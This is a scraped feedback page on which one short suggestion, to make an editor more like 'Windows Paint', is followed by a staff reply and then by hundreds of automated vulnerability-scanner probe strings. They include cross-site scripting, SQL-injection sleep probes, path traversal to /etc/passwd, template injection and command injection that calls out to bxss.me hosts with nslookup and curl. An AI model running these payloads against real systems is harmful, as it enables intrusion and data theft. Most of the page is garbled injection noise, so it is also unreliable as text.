Feedback
Submit suggestionhow come the editor is so hard to use by Rcasassin - 151 months ago
you should make it like "windows paint"
you should make it like "windows paint"
434 agree
Unvote8064 agree
2858 agree
798 agree
772 agree
746 agree
746 agree
710 agree
681 agree
661 agree
660 agree
644 agree
632 agree
623 agree
622 agree
602 agree
592 agree
590 agree
579 agree
578 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
552 agree
522 agree
522 agree
519 agree
511 agree
506 agree
497 agree
495 agree
493 agree
489 agree
488 agree
482 agree
478 agree
476 agree
469 agree
467 agree
465 agree
461 agree
460 agree
455 agree
455 agree
441 agree
434 agree
432 agree
420 agree
Erik
We're working on this.lxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1CixNDkk7LO1Dt0PYk3BrO
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${9999332+10000018}WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg${9999533+9999049}
1WfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
response.write(9532662*9237174)WfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
file:///etc/passwdAnonymous
1WfxYANoW
/etc/shellsWfxYANoW
'+response.write(9532662*9237174)+'WfxYANoW
"+response.write(9532662*9237174)+"WfxYANoW
echo zhrnxb$()\ dpbosm\nz^xyu||a #' &echo zhrnxb$()\ dpbosm\nz^xyu||a #|" &echo zhrnxb$()\ dpbosm\nz^xyu||a #WfxYANoW
&echo yecqfc$()\ mjpbvd\nz^xyu||a #' &echo yecqfc$()\ mjpbvd\nz^xyu||a #|" &echo yecqfc$()\ mjpbvd\nz^xyu||a #WfxYANoW
1WfxYANoW
1&echo ojqzjr$()\ dwbabi\nz^xyu||a #' &echo ojqzjr$()\ dwbabi\nz^xyu||a #|" &echo ojqzjr$()\ dwbabi\nz^xyu||a #WfxYANoW
../../../../../../../../../../../../../../etc/shellsresponse.write(9152462*9938165)
1WfxYANoW
../1WfxYANoW
c:/windows/win.iniWfxYANoW
SaWAdJftWfxYANoW
|echo fubbwz$()\ fsntbt\nz^xyu||a #' |echo fubbwz$()\ fsntbt\nz^xyu||a #|" |echo fubbwz$()\ fsntbt\nz^xyu||a #'+response.write(9152462*9938165)+'
1file:///etc/passwd
1WfxYANoW
bxss.meWfxYANoW
1WfxYANoW
XRZyZPUn: ysnwklID"+response.write(9152462*9938165)+"
1WfxYANoW
1&n949104=v908987BBjbgi4f
1../WfxYANoW
1WfxYANoW
1|echo vrbjps$()\ vfhnzc\nz^xyu||a #' |echo vrbjps$()\ vfhnzc\nz^xyu||a #|" |echo vrbjps$()\ vfhnzc\nz^xyu||a #PxFlXUDm: gxJ8h1df
1Zlg5YjNVYXo=
1WfxYANoW
(nslookup -q=cname hitveyyrojmki8eafc.bxss.me||curl hitveyyrojmki8eafc.bxss.me))WfxYANoW
$(nslookup -q=cname hitnusnejcfgg42535.bxss.me||curl hitnusnejcfgg42535.bxss.me)WfxYANoW
)WfxYANoW&n929962=v990920
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1Http://bxss.me/t/fit.txt
1WfxYANoW
'.gethostbyname(lc('hitxp'.'nmgxtquff81bd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(65).chr(122).chr(69).'WfxYANoW
&nslookup -q=cname hithyimnvfqoh3d1b3.bxss.me&'\"`0&nslookup -q=cname hithyimnvfqoh3d1b3.bxss.me&`'http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
1WfxYANoW
".gethostbyname(lc("hitis"."adllinru2d2c5.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(78).chr(103).chr(88)."WfxYANoW
&(nslookup -q=cname hitwxxszciodxbc55b.bxss.me||curl hitwxxszciodxbc55b.bxss.me)&'\"`0&(nslookup -q=cname hitwxxszciodxbc55b.bxss.me||curl hitwxxszciodxbc55b.bxss.me)&`'/etc/shells
1WfxYANoW
|(nslookup -q=cname hitpmfefstzjw1b592.bxss.me||curl hitpmfefstzjw1b592.bxss.me)WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
gethostbyname(lc('hitkf'.'oigilmga70eff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(73).chr(103).chr(90)WfxYANoW
';print(md5(31337));$a='WfxYANoW
!(()&&!|*|*|WfxYANoW
";print(md5(31337));$a="WfxYANoW
'"()WfxYANoW
`(nslookup -q=cname hituhfzrjqpwx5eb72.bxss.me||curl hituhfzrjqpwx5eb72.bxss.me)`c:/windows/win.ini
1WfxYANoW
1'&&sleep(27*1000)*fdmimn&&'bxss.me
1WfxYANoW
1"&&sleep(27*1000)*wfeznx&&"WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
1'||sleep(27*1000)*vsbgmc||'WfxYANoW
1"||sleep(27*1000)*nztjol||"WfxYANoW
^(#$!@#$)(()))******WfxYANoW
${@print(md5(31337))}WfxYANoW
;(nslookup -q=cname hithrnimuwchc02580.bxss.me||curl hithrnimuwchc02580.bxss.me)|(nslookup -q=cname hithrnimuwchc02580.bxss.me||curl hithrnimuwchc02580.bxss.me)&(nslookup -q=cname hithrnimuwchc02580.bxss.me||curl hithrnimuwchc02580.bxss.me)WfxYANoW
xfs.bxss.meWfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitwksgwvcfscc9aa7.bxss.me||curl${IFS}hitwksgwvcfscc9aa7.bxss.me)xfs.bxss.me
1WfxYANoW
${@print(md5(31337))}\)
1WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitnlhdyyhybded48c.bxss.me||curl${IFS}hitnlhdyyhybded48c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnlhdyyhybded48c.bxss.me||curl${IFS}hitnlhdyyhybded48c.bxss.me)&`'WfxYANoW
'.print(md5(31337)).'WfxYANoW
'"WfxYANoW
<!--!(()&&!|*|*|
1WfxYANoW
1';print(md5(31337));$a='
1'"
1WfxYANoW
1'"()&%<zzz><ScRiPt >ZLQ8(9996)</ScRiPt>";print(md5(31337));$a="
1<!--
1WfxYANoW
1^(#$!@#$)(()))******
1WfxYANoW
'"()&%<zzz><ScRiPt >ZLQ8(9969)</ScRiPt>WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(105).concat(67).concat(102).concat(65)+(require"socket" Socket.gethostbyname("hitmq"+"qkwewklaae69f.bxss.me.")[3].to_s)+"${@print(md5(31337))}
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(113).concat(77).concat(122).concat(70)+(require'socket' Socket.gethostbyname('hitzb'+'lywdinuz874bc.bxss.me.')[3].to_s)+''"()
1WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
'A'.concat(70-3).concat(22*4).concat(108).concat(65).concat(122).concat(77)+(require'socket' Socket.gethostbyname('hitsx'+'qqupcung2f36e.bxss.me.')[3].to_s)WfxYANoW'&&sleep(27*1000)*olyexw&&'
1HttP://bxss.me/t/xss.html?%00
1WfxYANoW
19697856${@print(md5(31337))}\
1WfxYANoW
commentWfxYANoW"&&sleep(27*1000)*dvfrok&&"
1'.print(md5(31337)).'
1bxss.me/t/xss.html?%00
1WfxYANoW
comment�WfxYANoW
bfg6841<s1﹥s2ʺs3ʹhjl6841WfxYANoW'||sleep(27*1000)*zdhdqe||'
1WfxYANoW
comment/.WfxYANoW"||sleep(27*1000)*kayjyu||"
1comment
1comment�
1WfxYANoW
<%={{={@{#{${dfb}}%>comment/.
1WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >ZLQ8(9614)</ScRiPt>WfxYANoW
1<WCQU1F>CTTTZ[!+!]</WCQU1F>WfxYANoW
1<script>ZLQ8(9892)</script>WfxYANoW
1<script>ZLQ8(9776)</script>9776WfxYANoW
1WfxYANoW
1<ScR<ScRiPt>IpT>ZLQ8(9490)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >ZLQ8(9978)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9355></ScRiPt>WfxYANoW
1<�ScRiPt >ZLQ8(9244)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=ZLQ8(9209)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9171'>WfxYANoW
1<body onload=ZLQ8(9503)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=ZLQ8(9111)>WfxYANoW
1<img src=xyz OnErRor=ZLQ8(9326)>WfxYANoW
1<img/src=">" onerror=alert(9317)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%5A%4C%51%38%289447%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\ZLQ8(9056)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>ZLQ8(9803)</sCripT>WfxYANoW
1<input autofocus onfocus=ZLQ8(9880)>WfxYANoW
1hPlnilcvWfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(ZLQ8(9562))}WfxYANoW
1jFL4d <ScRiPt >ZLQ8(9361)</ScRiPt>WfxYANoW
1<WAD8NT>4AHF3[!+!]</WAD8NT>WfxYANoW
1<ifRAme sRc=9784.com></IfRamE>WfxYANoW
1<aj3pMsg x=9364>WfxYANoW
1<img sRc='http://attacker-9468/log.php?WfxYANoW
1<adVp68o<WfxYANoW'"()&%<zzz><ScRiPt >ZLQ8(9170)</ScRiPt>
1'"()&%<zzz><ScRiPt >ZLQ8(9692)</ScRiPt>
1WfxYANoW
1WfxYANoW9795741
1bfg5973<s1﹥s2ʺs3ʹhjl5973
1WfxYANoW
-1 OR 2+70-70-1=0+0+0+1 --WfxYANoW
-1 OR 2+494-494-1=0+0+0+1WfxYANoW
-1' OR 2+733-733-1=0+0+0+1 --<%={{={@{#{${dfb}}%>
1WfxYANoW
-1' OR 2+628-628-1=0+0+0+1 or 'BpfP9GoM'='WfxYANoW
-1" OR 2+18-18-1=0+0+0+1 --<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >ZLQ8(9388)</ScRiPt>
1WfxYANoW<WQP6WW>ESD8R[!+!]</WQP6WW>
1WfxYANoW<script>ZLQ8(9674)</script>
1WfxYANoW<script>ZLQ8(9547)</script>9547
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW<ScRiPt >ZLQ8(9333)</ScRiPt>
1WfxYANoW<�ScRiPt >ZLQ8(9220)</ScRiPt>
1WfxYANoW<body onload=ZLQ8(9679)>
1WfxYANoW<img src=xyz OnErRor=ZLQ8(9935)>
1WfxYANoW<img/src=">" onerror=alert(9378)>
1WfxYANoW\u003CScRiPt\ZLQ8(9042)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>ZLQ8(9761)</sCripT>
1WfxYANoW<input autofocus onfocus=ZLQ8(9432)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(ZLQ8(9275))}
1WfxYANoWATGTf <ScRiPt >ZLQ8(9528)</ScRiPt>
1WfxYANoW<WUEHUY>6J536[!+!]</WUEHUY>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<ifRAme sRc=9588.com></IfRamE>
1WfxYANoW<aizmJpD x=9313>
1WfxYANoW<img sRc='http://attacker-9994/log.php?
1WfxYANoW<aWPxVup<
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1wtJH0WU3'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 937=(SELECT 937 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 252=(SELECT 252 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 778=(SELECT 778 FROM PG_SLEEP(15))--WfxYANoW
1LQaMiwcQ' OR 77=(SELECT 77 FROM PG_SLEEP(15))--WfxYANoW
1PCITRhQK') OR 699=(SELECT 699 FROM PG_SLEEP(15))--WfxYANoW
12eWMzxau')) OR 649=(SELECT 649 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@7ZpJQWfxYANoW
1WfxYANoW
1WfxYANoWWdu7xKJF
1WfxYANoW
1-1 OR 2+934-934-1=0+0+0+1 --
1-1 OR 2+477-477-1=0+0+0+1
1-1' OR 2+275-275-1=0+0+0+1 --
1-1' OR 2+707-707-1=0+0+0+1 or 'YN1yt2kN'='
1-1" OR 2+494-494-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWM9w9PfYo'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@Mzafn
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comquhpbigb
1bkspjhki
response.write(9068882*9728220)bbdwsuyx
1bkspjhki
'+response.write(9068882*9728220)+'bbdwsuyx
1kofeuiqe
set|set&setominijqw
1Mc2VjyQbkspjhki
"+response.write(9068882*9728220)+"bbdwsuyx
mpt0trMukofeuiqe
$(nslookup XEsz8m8k)tylD7ZTv
1xettmivv
../../../../../../../../../../etc/passwdresponse.write(9488268*9218859)
1bbdwsuyx
-1 OR 2+306-306-1=0+0+0+1 --kofeuiqe
&nslookup Mwvadvwq&'\"`0&nslookup Mwvadvwq&`'avnaecnv
1xettmivv
../../../../../../../../../../../../../../../proc/version'+response.write(9488268*9218859)+'
1bbdwsuyx
-1 OR 2+221-221-1=0+0+0+1set|set&set
1xettmivv
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg"+response.write(9488268*9218859)+"
1bbdwsuyx
-1' OR 2+508-508-1=0+0+0+1 --$(nslookup h2pthyU3)
1xettmivv
../../../../../../../../../../etc/passwd�.jpgbaegugls
${10000363+10000245}bbdwsuyx
-1' OR 2+810-810-1=0+0+0+1 or 'F5AimhTl'='&nslookup LZULWlqI&'\"`0&nslookup LZULWlqI&`'
1tgnghjke
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgxettmivv
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg${10000164+9999950}
1bbdwsuyx
-1" OR 2+178-178-1=0+0+0+1 --cXlsVHBib3I=
1avnaecnv
1tgnghjke
1some_inexistent_file_with_long_name�.jpgxettmivv
/../..//../..//../..//../..//../..//etc/passwd�.jpgbghoqgsm
1&n989698=v925148bbdwsuyx
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/Anonymous
1aatlweva
)tgnghjke
Http://testasp.vulnweb.com/t/fit.txtxettmivv
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdbbdwsuyx
if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/aatlweva
!(()&&!|*|*|tgnghjke
http://testasp.vulnweb.com/t/fit.txt?.jpgxettmivv
/etc/passwdmafphhjc&n956985=v985902
1bbdwsuyx
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/aatlweva
^(#$!@#$)(()))******tgnghjke
testasp.vulnweb.comxettmivv
%2fetc%2fpasswdbbdwsuyx
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/)
1xettmivv
/.././.././.././.././.././.././.././../etc/./passwd%00bbdwsuyx
-1; waitfor delay '0:0:4' --sbrbkcim
;print(md5(acunetix_wvs_security_test));sdbuxyvw
'"()!(()&&!|*|*|
1mqlpkkuc
http://testasp.vulnweb.com/t/xss.html?%00.jpg1some_inexistent_file_with_long_name�.jpg
1xettmivv
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdbbdwsuyx
-1; waitfor delay '0:0:12' --sbrbkcim
';print(md5(acunetix_wvs_security_test));$a='^(#$!@#$)(()))******
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
1rgseqshu
1Http://testasp.vulnweb.com/t/fit.txt
1xettmivv
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdbbdwsuyx
-1); waitfor delay '0:0:8' --sbrbkcim
";print(md5(acunetix_wvs_security_test));$a="'"()
1umbhwdmp
http://hitCyuEdDJGYd.bxss.me/nyysjeof
1rgseqshu
commenthttp://testasp.vulnweb.com/t/fit.txt?.jpg
1bbdwsuyx
1 waitfor delay '0:0:8' --sbrbkcim
${@print(md5(acunetix_wvs_security_test))}snttcrdm
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))nyysjeof
1'"http://hittKXIk8xa4P.bxss.me/
1rgseqshu
comment�testasp.vulnweb.com
1xettmivv
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.bbdwsuyx
zaAa9boa'; waitfor delay '0:0:8' --sbrbkcim
${@print(md5(acunetix_wvs_security_test))}\nyysjeof
\worvbjry
/www.vulnweb.comrgseqshu
comment/.wcxuiblo
'"xettmivv
file:///etc/passwdbbdwsuyx
-1;select pg_sleep(8); --;print(md5(acunetix_wvs_security_test));
1trsjgdke
1'"()&%<acx><ScRiPt >gwKi(9484)</ScRiPt>/www.vulnweb.com
1rgseqshu
1wcxuiblo
<!--xettmivv
/\../\../\../\../\../\../\../etc/passwdbbdwsuyx
-1);select pg_sleep(12); --';print(md5(acunetix_wvs_security_test));$a='
1nyysjeof
@@eiwKScomment
1'"
1xettmivv
WEB-INF/web.xmlbbdwsuyx
-1));select pg_sleep(12); --";print(md5(acunetix_wvs_security_test));$a="
1nyysjeof
JyI=trsjgdke
'"()&%<acx><ScRiPt >gwKi(9233)</ScRiPt>comment�
1<!--
1xettmivv
/WEB-INF/web.xmlbbdwsuyx
q5wJfhQj';select pg_sleep(12); --${@print(md5(acunetix_wvs_security_test))}
1comment/.
1xettmivv
WEB-INF\web.xmlbbdwsuyx
uWCOaV67');select pg_sleep(4); --${@print(md5(acunetix_wvs_security_test))}\
1trsjgdke
1_9676../../../../../../../../../../etc/passwd
1bbdwsuyx
zFgL7VOD');select pg_sleep(0); --nyysjeof
(select convert(int,CHAR(65)))bbdwsuyx
vmcCIK9w'));select pg_sleep(4); --nyysjeof
1trsjgdke
acu7666<s1﹥s2ʺs3ʹuca7666bbdwsuyx
11'"
1../../../../../../../../../../etc/passwd�.jpg
1bbdwsuyx
1\
1EprioN8z
1-1 OR 2+91-91-1=0+0+0+1 --
1@@CQYp1
1trsjgdke
{{10000079*9999770}}.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1-1 OR 2+536-536-1=0+0+0+1
1JyI=
1/etc/passwd
1-1' OR 2+595-595-1=0+0+0+1 --
1trsjgdke
1<ScRiPt >gwKi(9373)</ScRiPt>%2fetc%2fpasswd
1-1' OR 2+671-671-1=0+0+0+1 or 'Q5XpChBT'='
1-1" OR 2+608-608-1=0+0+0+1 --
1(select convert(int,CHAR(65)))
1trsjgdke
1<WXXJUR>WFLLI[!+!]</WXXJUR>trsjgdke
1<script>gwKi(9709)</script>1 waitfor delay '0:0:12' --
1h0eoF4hQ'; waitfor delay '0:0:12' --
1trsjgdke
1<ScR<ScRiPt>IpT>gwKi(9681)</sCr<ScRiPt>IpT>2r9tudLh';select pg_sleep(4); --
1file:///etc/passwd
1nEr0CIZL');select pg_sleep(4); --
1/\../\../\../\../\../\../\../etc/passwd
1trsjgdke
1<ScRiPt >gwKi(9363)</ScRiPt>mQstFyrH'));select pg_sleep(4); --
1WEB-INF/web.xml
1/WEB-INF/web.xml
1trsjgdke
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9849></ScRiPt>WEB-INF\web.xml
1trsjgdke
1<�ScRiPt >gwKi(9809)</ScRiPt>trsjgdke
1<video><source onerror="javascript:gwKi(9525)">trsjgdke
1<isindex type=image src=1 onerror=gwKi(9862)>trsjgdke
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9726'>trsjgdke
1<body onload=gwKi(9538)>trsjgdke
1<img src=//testasp.vulnweb.com/t/dot.gif onload=gwKi(9753)>trsjgdke
1<img src=xyz OnErRor=gwKi(9585)>trsjgdke
1<img/src=">" onerror=alert(9477)>trsjgdke
%31%3C%53%63%52%69%50%74%20%3E%67%77%4B%69%289897%29%3C%2F%73%43%72%69%70%54%3Etrsjgdke
1\u003CScRiPt\gwKi(9869)\u003C/sCripT\u003Etrsjgdke
1<ScRiPt>gwKi(9066)</sCripT>trsjgdke
1<input autofocus onfocus=gwKi(9868)>trsjgdke
<a HrEF=http://www.vulnweb.com></a>trsjgdke
<a HrEF=jaVaScRiPT:>trsjgdke
[url=http://www.vulnweb.com][/url]trsjgdke
1<img<!-- --> src=x onerror=alert(9638);//><!-- -->trsjgdke
1}body{acu:Expre/**/SSion(gwKi(9430))}trsjgdke
1<% contenteditable onresize=gwKi(9802)>trsjgdke
1_EcesD <ScRiPt >gwKi(9708)</ScRiPt>trsjgdke
1<WMREKG>JL3E4[!+!]</WMREKG>trsjgdke
1<ifRAme sRc=9251.com></IfRamE>trsjgdke
1<P1yHaD x=9647>trsjgdke
1<img sRc='http://attacker-9890/log.php?trsjgdke'"()&%<acx><ScRiPt >gwKi(9341)</ScRiPt>
1'"()&%<acx><ScRiPt >gwKi(9431)</ScRiPt>
1trsjgdke_9584
1acu7854<s1﹥s2ʺs3ʹuca7854
1{{10000315*10000190}}
1trsjgdke<ScRiPt >gwKi(9122)</ScRiPt>
1trsjgdke<W7C6DB>JYDL2[!+!]</W7C6DB>
1trsjgdke<script>gwKi(9106)</script>
1trsjgdke<ScRiPt >gwKi(9301)</ScRiPt>
1trsjgdke<�ScRiPt >gwKi(9069)</ScRiPt>
1trsjgdke<body onload=gwKi(9032)>
1trsjgdke<img src=xyz OnErRor=gwKi(9150)>
1trsjgdke<img/src=">" onerror=alert(9082)>
1trsjgdke\u003CScRiPt\gwKi(9000)\u003C/sCripT\u003E
1trsjgdke<ScRiPt>gwKi(9893)</sCripT>
1trsjgdke<input autofocus onfocus=gwKi(9801)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1trsjgdke}body{acu:Expre/**/SSion(gwKi(9676))}
1trsjgdke<% contenteditable onresize=gwKi(9370)>
1trsjgdke_LBEZp <ScRiPt >gwKi(9387)</ScRiPt>
1trsjgdke<WNXSIG>VHJME[!+!]</WNXSIG>
1trsjgdke<ifRAme sRc=9386.com></IfRamE>
1trsjgdke<42VEKN x=9464>
1trsjgdke<img sRc='http://attacker-9077/log.php?
1Comment